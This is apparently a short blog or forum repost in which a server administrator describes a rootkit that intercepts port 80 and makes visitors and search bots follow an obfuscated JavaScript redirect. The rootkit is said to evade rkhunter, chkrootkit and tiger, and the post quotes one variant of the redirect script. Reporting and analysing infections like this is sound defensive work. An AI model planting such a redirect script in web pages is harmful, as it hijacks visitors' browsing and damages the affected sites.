The rootkit intercepts port 80 and returns the follow JS code to clients. It forces them to redirect, including the search engine bots.
It works on many CMS and Blogs as they redirect unknown non-file traffic to the /index.php (because of slug support, SEO etc.).
It is not visible to rkhunter, chkrootkit and tiger, at least not in the first place. Other "features" include outgoing probes or open proxying.
The attack vector could be segfaulting webservers during DDOS runs.
This is the JS code (one of endless variations):
<!DOCTYPE html><html><title></title><script>var y=window</script><script>var x={o:'/HHHHRofoZ/',c:1},z=4;function rsu(h){return(x.o).substr(0,x.c)+(x.o).substr(x.c+h)}y.location.assign(rsu(z))</script></html>
I found someone mentioning this code here last year http://ift.tt/1H602hW but without any specific hints or solutions but at least it is not completely "new".
Aucun commentaire:
Enregistrer un commentaire